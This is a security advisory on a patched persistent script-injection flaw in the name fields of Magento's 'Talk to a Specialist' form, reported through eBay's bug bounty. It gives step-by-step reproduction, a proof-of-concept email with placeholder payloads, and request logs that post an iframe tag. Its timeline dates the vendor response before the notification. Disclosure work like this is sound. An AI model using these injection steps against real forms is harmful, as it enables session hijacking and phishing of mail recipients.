Ebay Inc Magento 2015Q1 - Official Bug Bounty Program rewards Security Researcher


Application-Side Vulnerability in Magento Disclosed By Researcher

The well-known and trusted "Ebay Inc Bug Bounty Program" has rewarded a researcher who disclosed an issue in the official Magento service. To report a vulnerability in the Magento service, the eBay Inc Bug Bounty Program submission tool must be used.

The German researcher Benjamin Kunz Mejri discovered an application-side input validation issue, combined with a mail encoding web vulnerability, and reported it to eBay in 2014 Q1. Two days ago the "Ebay Inc Bug Bounty Program" notified the Vulnerability Labs core team researcher that the patch had been successfully implemented. The company paid a reward of 500€ for the valid vulnerability report. The issue is described in detail below as one of the rare Tier 2 application issues.

2014-03-14: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
2014-03-15: Vendor Notification (eBay Inc Security Team - Bug Bounty Program)
2014-03-10: Vendor Response/Feedback (eBay Inc Security Team - Bug Bounty Program)
2015-02-12: Vendor Fix/Patch (Magento Developer Team)
2015-02-13: Bug Bounty Reward (eBay Inc Security Team - Bug Bounty Program)
2015-02-14: Public Disclosure (Vulnerability Laboratory)

The vulnerability is located in the firstname and lastname values of the `Talk to a Specialist` module. Remote attackers without a privileged application user account are able to inject persistent malicious script code. The script code executes in the notification mail to the specialist and also in the copy mail sent to the active user. The persistently injected script code executes in the header section of the mail, where the firstname and lastname values from the database context are displayed. The sender is triggered automatically through the magento.com and info.magento.com service. The db-stored outgoing values are not correctly encoded when they are validated, which allows persistent injection of malicious script code via the POST method. The attack vector is persistent and the injection request method is POST.

The security risk of the mail encoding web vulnerability is estimated as medium with a CVSS (Common Vulnerability Scoring System) count of 3.8. Exploitation of the web vulnerability requires no privileged web-application user account and only low or medium user interaction because the attack vector is persistent. Successful exploitation of the encoding vulnerability can result in session hijacking, persistent phishing, persistent external redirects and persistent manipulation of the web header or mail body context.

Vulnerable Domain(s):
[+] magento.com & info.magento.com

Vulnerable Module(s):
[+] Talk to a Specialist

Vulnerable Parameter(s):
[+] firstname
[+] lastname
[+] companyname

Affected Sender(s):
[+] info@magento.com

Affected Receiver(s):
[+] bkm@evolution-sec.com

Affected Context Module(s):
[+] Section 1  > mktEditable

Proof of Concept (PoC):
The application-side input validation web vulnerability can be exploited by remote attackers without a privileged user account and with low or medium user interaction. To demonstrate or reproduce the mail encoding web vulnerability, follow the information and steps provided below.

Manual steps to reproduce the vulnerability ...
1. You do not need to register an account ;)
2. Open the main website and switch to the magento.com contacts site
3. At the bottom, click the `talk to specialist` button
4. You are redirected to a regular, valid form with a mod specialist notification
5. Inject your script code payloads as the first-, last- and companyname values
6. Click the send request button ...
Note: Now you will be redirected by the service after choosing a specialist ... we used `E.C. Kraus` (#sry ;)
7. Send the same request from the input below to the specialist with a non-malicious test payload
8. The persistent code execution occurs in the mail to the manager aka specialist and also in the mail to the sender of the notification itself (without user auth!)
9. Successful reproduction of the persistent script code injection web vulnerability via POST method request

PoC: Your E.C. Kraus Magento Enterprise Case Study Download

<html><head>
<title>Your E.C. Kraus Magento Enterprise Case Study Download</title>
<link rel="important stylesheet" href="chrome://messagebody/skin/messageBody.css">
</head>
<body>
<table class="header-part1" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody><tr><td><b>Betreff: </b>Your E.C. Kraus Magento Enterprise Case Study Download</td></tr><tr><td>
<b>Von: </b>Magento <info@magento.com></td></tr><tr><td><b>Datum: </b>15.03.2014 20:27</td></tr></tbody></table>
<table class="header-part2" border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr><td><b>An: </b>bkm@evolution-sec.com</td></tr></tbody></table><br>
<meta http-equiv="Content-Type" content="text/html; ">
<title></title>

<div id="Section 1" class="mktEditable"><p>Dear a "><[PERSISTENT INJECTED SCRIPT CODE 1!]">%20<[PERSISTENT INJECTED SCRIPT CODE 2!]>,</p>
<p>Thank you for requesting the Magento Enterprise Case Study on E.C. Kraus.  You can download the Case Study here:</p>
<p><a href=
"http://email.magento.com/397EXO8770000EP01aGC801"
>Download</a></p>
<p>Check out our complete list of <a href=
"http://email.magento.com/397EXO8770000EQ01aGC801"
>Magento Case Studies</a></p>
<p>To learn more about Magento Enterprise or to reqeust a personalized quote, please <a href=
"http://email.magento.com/397EXO8770000ER01aGC801"
>contact out Magento Enterprise team</a>.</p>
<p>Thank you,</p>
<p>The Magento Team</p></div>
<IMG SRC="http://email.magento.com/trk?t=1&mid=Mzk3LUVYTy04Nzc6MDozMzkyOjExMzI1OjA... WIDTH="1" HEIGHT="1" BORDER="0" ALT="" />
</body>
</html>
</body>
</html>
</iframe></p></div></body></html>

--- PoC Session Logs [POST] ---
Status: 200[OK]
GET http://magento.com/explore/contact-sales

Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[-1] Mime Type[text/html]
   Request Header:
      Host[magento.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://magento.com/customers/customer-showcase]
      Cookie[optimizelySegments=%7B%22239237138%22%3A%22direct%22%2C%22237962548%22%3A%22ff%22%2C%22238367687%22%3A%22false%22%7D; optimizelyEndUserId=oeu1394911379094r0.20693940633527685; optimizelyBuckets=%7B%7D; _ga=GA1.2.394130418.1394911379; has_js=1; ClrSSID=1394911380598-4406; ClrOSSID=1394911380598-4406; ClrSCD=1394911380598; s_cc=true; s_fid=5EF56BF224B1A40C-0256902EC3CD13C6; gpv_pn=%2Fcustomers%2Fcustomer-showcase; undefined_s=First%20Visit; s_vnum=1396303200710%26vn%3D1; s_invisit=true; s_sq=magentomagento%2Cmagentoglobal%3D%2526pid%253D%25252Fcustomers%25252Fcustomer-showcase%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fmagento.com%25252Fexplore%25252Fcontact-sales_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=-%2C84%2C84%2C2200; utm_src=a%3A6%3A%7Bs%3A8%3A%22campaign%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22medium%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22source%22%3Bs%3A11%3A%22magento.com%22%3Bs%3A7%3A%22keyword%22%3Bs%3A0%3A%22%22%3Bs%3A3%3A%22url%22%3Bs%3A11%3A%22magento.com%22%3Bs%3A4%3A%22time%22%3Bi%3A1394911525%3B%7D; _mkto_trk=id:397-EXO-877&token:_mch-magento.com-1394911532816-55587; _tsm=m%3DDirect%2520%252F%2520Brand%2520Aware%253A%2520Typed%2520%252F%2520Bookmarked%2520%252F%2520etc%7Cs%3Dmagento.com%7Crp%3D%252Fwww.magentocommerce.com%252Fdownload%7Crd%3Dmagento.com]
      Connection[keep-alive]
      If-None-Match["1394841413-1"]
   Response Header:
      Server[maged]
      Date[Sat, 15 Mar 2014 20:15:18 GMT]
      Content-Type[text/html; charset=utf-8]
      Transfer-Encoding[chunked]
      Connection[keep-alive]
      X-Drupal-Cache[HIT]
      Etag["1394841413-1"]
      x-content-type-options[nosniff]
      X-Frame-Options[SameOrigin]
      Content-Language[en]
      Link[<http://magento.com/explore/contact-sales>; rel="canonical",<http://magento.com/node/22>; rel="shortlink"]
      Cache-Control[public, max-age=86400]
      Last-Modified[Fri, 14 Mar 2014 23:56:53 +0000]
      Expires[Sun, 19 Nov 1978 05:00:00 GMT]
      Vary[Cookie, Accept-Encoding]
      Content-Encoding[gzip]
      X-Server[web04]

-
Status: 302[Found]
POST https://info.magento.com/index.php/leadCapture/save

Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[135] Mime Type[text/html]
   Request Header:
      Host[info.magento.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[https://info.magento.com/EC-Kraus.html]
      Cookie[optimizelySegments=%7B%22239237138%22%3A%22direct%22%2C%22237962548%22%3A%22ff%22%2C%22238367687%22%3A%22false%22%7D; optimizelyEndUserId=oeu1394911379094r0.20693940633527685; optimizelyBuckets=%7B%7D; _ga=GA1.2.394130418.1394911379; BIGipServerabjweb-ssl2_http=3892838666.20480.0000; s_cc=true; s_fid=5EF56BF224B1A40C-0256902EC3CD13C6; gpv_pn=%2Fec-kraus.html; undefined_s=First%20Visit; s_vnum=1396303200710%26vn%3D1; s_invisit=true; s_sq=magentoinfo%2Cmagentoglobal%3D%2526pid%253D%25252Fec-kraus.html%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BformSubmit%252528document.getElementById%252528%252522mktForm_1129%252522%252529%252529%25253Breturnfalse%25253B%25257D%2526oidt%253D2%2526ot%253DSUBMIT; s_ppv=-%2C100%2C100%2C832; utm_src=a%3A6%3A%7Bs%3A8%3A%22campaign%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22medium%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22source%22%3Bs%3A11%3A%22magento.com%22%3Bs%3A7%3A%22keyword%22%3Bs%3A0%3A%22%22%3Bs%3A3%3A%22url%22%3Bs%3A11%3A%22magento.com%22%3Bs%3A4%3A%22time%22%3Bi%3A1394911525%3B%7D; BIGipServerabjweb-ssl2_https=3909615882.47873.0000; ClrSSID=1394911532386-9188; ClrOSSID=1394911532386-9188; ClrSCD=1394911532386; _mkto_trk=id:397-EXO-877&token:_mch-magento.com-1394911532816-55587; _tsm=m%3DDirect%2520%252F%2520Brand%2520Aware%253A%2520Typed%2520%252F%2520Bookmarked%2520%252F%2520etc%7Cs%3Dmagento.com%7Crp%3D%252Fwww.magentocommerce.com%252Fdownload%7Crd%3Dmagento.com; optimizelyPendingLogEvents=%5B%5D; ClrCSTO=T]
      Connection[keep-alive]
   POST-Daten:
      FirstName[%3Ciframe+src%3Da%3E]
      LastName[%3Ciframe+src%3Da%3E]
      Email[bkm%40evolution-sec.com]
      _marketo_comments[]
      lpId[2314]
      subId[36]
      munchkinId[397-EXO-877]
      kw[not+found]
      cr[not+found]
      searchstr[not+found]
      lpurl[https%3A%2F%2Finfo.magento.com%2FEC-Kraus.html%3Fcr%3D%7Bcreative%7D%26kw%3D%7Bkeyword%7D]
      formid[1129]
      returnURL[https%3A%2F%2Finfo.magento.com%2FEC-Kraus-confirm.html]
      retURL[https%3A%2F%2Finfo.magento.com%2FEC-Kraus-confirm.html]
      returnLPId[2301]
      _mkt_disp[return]
      _mkt_trk[id%3A397-EXO-877%26token%3A_mch-magento.com-1394911532816-55587]
      _comments_marketo[]
      _mkto_version[2.4.7]
   Response Header:
      Date[Sat, 15 Mar 2014 20:15:34 GMT]
      Server[Apache]
      Location[https://info.magento.com/EC-Kraus-confirm.html?aliId=67114725]
      Vary[Accept-Encoding]
      Content-Encoding[gzip]
      Content-Length[135]
      Connection[close]
      Content-Type[text/html]

Reference(s):
http://magento.com/customers/customer-showcase
http://magento.com/explore/contact-sales
https://info.magento.com/EC-Kraus-confirm.html?aliId=67114607
https://info.magento.com/EC-Kraus.html
https://info.magento.com/index.php/leadCapture/save

The vulnerability has been patched by securely parsing and encoding the `talk to a specialist` input context. The service now encodes and parses the outgoing user values of the talk to a specialist form to prevent persistent injections via POST. A restriction has also been placed on the input that disallows the use of special characters.

Advisory: http://www.vulnerability-lab.com/get_content.php?id=1226
